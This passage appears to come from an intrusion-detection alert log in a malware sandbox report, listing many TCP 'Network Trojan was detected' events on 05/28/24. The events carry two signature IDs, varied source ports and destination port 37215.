            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764964
            SID:2829579
            Source Port:51040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563515
            SID:2829579
            Source Port:59394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.442116
            SID:2835222
            Source Port:46152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000437
            SID:2829579
            Source Port:35322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877769
            SID:2829579
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564870
            SID:2835222
            Source Port:34642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883131
            SID:2835222
            Source Port:54428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086503
            SID:2835222
            Source Port:38952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857940
            SID:2835222
            Source Port:51952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828157
            SID:2829579
            Source Port:53450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516608
            SID:2829579
            Source Port:42878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772858
            SID:2835222
            Source Port:37794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930070
            SID:2829579
            Source Port:40584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.567677
            SID:2829579
            Source Port:36940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020168
            SID:2829579
            Source Port:51700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818360
            SID:2835222
            Source Port:47306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.383588
            SID:2829579
            Source Port:40042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762337
            SID:2829579
            Source Port:48588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873628
            SID:2829579
            Source Port:37628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808167
            SID:2829579
            Source Port:55990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.112231
            SID:2835222
            Source Port:49480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842917
            SID:2829579
            Source Port:39822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953528
            SID:2829579
            Source Port:44392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.035110
            SID:2829579
            Source Port:42688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.446785
            SID:2829579
            Source Port:57876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.768280
            SID:2835222
            Source Port:40640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696032
            SID:2829579
            Source Port:43250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704469
            SID:2829579
            Source Port:51928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771139
            SID:2835222
            Source Port:37180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871692
            SID:2835222
            Source Port:39858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714444
            SID:2829579
            Source Port:35396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811091
            SID:2835222
            Source Port:59288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.553784
            SID:2835222
            Source Port:37366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469759
            SID:2829579
            Source Port:43438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776953
            SID:2829579
            Source Port:52214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326617
            SID:2835222
            Source Port:49916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951441
            SID:2829579
            Source Port:55368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919393
            SID:2829579
            Source Port:37950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805739
            SID:2835222
            Source Port:49116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.774164
            SID:2835222
            Source Port:60648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.661660
            SID:2829579
            Source Port:54870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.677499
            SID:2835222
            Source Port:52530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860197
            SID:2829579
            Source Port:54694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998006
            SID:2829579
            Source Port:46326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045366
            SID:2829579
            Source Port:34922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.829412
            SID:2835222
            Source Port:35360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.307698
            SID:2835222
            Source Port:58854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773162
            SID:2829579
            Source Port:36748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810912
            SID:2835222
            Source Port:34076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878618
            SID:2829579
            Source Port:48350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953503
            SID:2829579
            Source Port:37368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843633
            SID:2835222
            Source Port:55806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846840
            SID:2835222
            Source Port:48224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777482
            SID:2835222
            Source Port:39966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919952
            SID:2829579
            Source Port:48356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922971
            SID:2835222
            Source Port:51594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956344
            SID:2829579
            Source Port:51830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.550067
            SID:2835222
            Source Port:51632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.423783
            SID:2829579
            Source Port:58492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929435
            SID:2835222
            Source Port:46610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.553018
            SID:2835222
            Source Port:39026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086465
            SID:2835222
            Source Port:54634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.332251
            SID:2835222
            Source Port:41454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777416
            SID:2829579
            Source Port:60462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486863
            SID:2835222
            Source Port:49502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615361
            SID:2829579
            Source Port:58222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865531
            SID:2829579
            Source Port:59308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030797
            SID:2835222
            Source Port:43014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739165
            SID:2829579
            Source Port:40642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808531
            SID:2835222
            Source Port:43052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639310
            SID:2829579
            Source Port:52346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300198
            SID:2829579
            Source Port:42450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.350567
            SID:2829579
            Source Port:38808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.606308
            SID:2829579
            Source Port:47028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.402645
            SID:2829579
            Source Port:51092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990311
            SID:2835222
            Source Port:36906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716629
            SID:2835222
            Source Port:49000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.846524
            SID:2829579
            Source Port:42556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470635
            SID:2829579
            Source Port:38526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368135
            SID:2829579
            Source Port:42894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931661
            SID:2829579
            Source Port:49130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808882
            SID:2829579
            Source Port:48512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533471
            SID:2835222
            Source Port:55122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058472
            SID:2829579
            Source Port:46860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748315
            SID:2829579
            Source Port:39492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.452349
            SID:2835222
            Source Port:36234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984784
            SID:2829579
            Source Port:60784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805590
            SID:2835222
            Source Port:37186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901326
            SID:2829579
            Source Port:39930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.956050
            SID:2829579
            Source Port:56900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848373
            SID:2829579
            Source Port:36274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936389
            SID:2835222
            Source Port:58572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734836
            SID:2835222
            Source Port:40794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995863
            SID:2829579
            Source Port:50248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.158391
            SID:2835222
            Source Port:37692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063454
            SID:2835222
            Source Port:57832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.932927
            SID:2835222
            Source Port:44384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851010
            SID:2829579
            Source Port:52562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739053
            SID:2835222
            Source Port:59290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.368799
            SID:2835222
            Source Port:34662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948061
            SID:2829579
            Source Port:46566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818488
            SID:2835222
            Source Port:57186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927138
            SID:2829579
            Source Port:45966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804756
            SID:2829579
            Source Port:37002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739856
            SID:2835222
            Source Port:57262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575867
            SID:2835222
            Source Port:34422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045943
            SID:2835222
            Source Port:57818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031426
            SID:2835222
            Source Port:59700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.738466
            SID:2835222
            Source Port:37408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770672
            SID:2835222
            Source Port:53752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261695
            SID:2835222
            Source Port:58120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.065868
            SID:2835222
            Source Port:53268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811073
            SID:2829579
            Source Port:50454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350496
            SID:2829579
            Source Port:60804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222038
            SID:2829579
            Source Port:49270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.548639
            SID:2835222
            Source Port:58824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303643
            SID:2835222
            Source Port:49154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704404
            SID:2829579
            Source Port:56322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894212
            SID:2829579
            Source Port:56318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943419
            SID:2835222
            Source Port:58954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.631658
            SID:2829579
            Source Port:34742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755050
            SID:2829579
            Source Port:48836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000486
            SID:2829579
            Source Port:39796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639260
            SID:2829579
            Source Port:56512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.953054
            SID:2829579
            Source Port:56964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014779
            SID:2835222
            Source Port:58312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052988
            SID:2829579
            Source Port:38356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058458
            SID:2835222
            Source Port:34694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870088
            SID:2829579
            Source Port:44326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774593
            SID:2835222
            Source Port:56484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917261
            SID:2829579
            Source Port:45406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533790
            SID:2829579
            Source Port:40142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765185
            SID:2835222
            Source Port:53544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434258
            SID:2835222
            Source Port:38336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956680
            SID:2835222
            Source Port:60734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988540
            SID:2829579
            Source Port:53252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506890
            SID:2835222
            Source Port:33492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563291
            SID:2835222
            Source Port:33080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.771804
            SID:2835222
            Source Port:60660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841448
            SID:2829579
            Source Port:33618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412808
            SID:2835222
            Source Port:46120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723842
            SID:2829579
            Source Port:37902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827574
            SID:2829579
            Source Port:44072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.310217
            SID:2835222
            Source Port:47900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924180
            SID:2835222
            Source Port:56806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068289
            SID:2835222
            Source Port:47206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809530
            SID:2829579
            Source Port:33148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870322
            SID:2829579
            Source Port:46718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.297272
            SID:2829579
            Source Port:59708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305444
            SID:2829579
            Source Port:41314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881872
            SID:2835222
            Source Port:45262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756042
            SID:2835222
            Source Port:50664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.115869
            SID:2835222
            Source Port:40880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680144
            SID:2829579
            Source Port:35256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.078878
            SID:2829579
            Source Port:36554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.349175
            SID:2835222
            Source Port:48488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966461
            SID:2835222
            Source Port:41244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343015
            SID:2829579
            Source Port:48662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654814
            SID:2829579
            Source Port:48964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810187
            SID:2835222
            Source Port:37736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434111
            SID:2829579
            Source Port:43542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.671350
            SID:2829579
            Source Port:39106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962590
            SID:2835222
            Source Port:34772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777574
            SID:2835222
            Source Port:44988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825399
            SID:2829579
            Source Port:55368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952466
            SID:2829579
            Source Port:57734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542478
            SID:2829579
            Source Port:34494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990187
            SID:2835222
            Source Port:33476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291296
            SID:2835222
            Source Port:34824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.719548
            SID:2829579
            Source Port:34574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864897
            SID:2835222
            Source Port:54254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855363
            SID:2829579
            Source Port:55474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.743605
            SID:2835222
            Source Port:38316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834124
            SID:2835222
            Source Port:40106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849663
            SID:2829579
            Source Port:34438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773982
            SID:2829579
            Source Port:58674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777287
            SID:2829579
            Source Port:45996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000844
            SID:2835222
            Source Port:54144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303617
            SID:2835222
            Source Port:49728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955911
            SID:2835222
            Source Port:39280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280782
            SID:2835222
            Source Port:43760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922363
            SID:2835222
            Source Port:58998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.768481
            SID:2835222
            Source Port:33390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931605
            SID:2835222
            Source Port:32970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026553
            SID:2835222
            Source Port:37568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930200
            SID:2835222
            Source Port:34760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895443
            SID:2829579
            Source Port:37508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818204
            SID:2835222
            Source Port:44892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836627
            SID:2829579
            Source Port:37128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919341
            SID:2835222
            Source Port:39686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919364
            SID:2829579
            Source Port:57444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052884
            SID:2835222
            Source Port:42612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.994713
            SID:2835222
            Source Port:59190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026347
            SID:2829579
            Source Port:33124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825784
            SID:2829579
            Source Port:37854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.386712
            SID:2829579
            Source Port:37240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388685
            SID:2835222
            Source Port:45414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
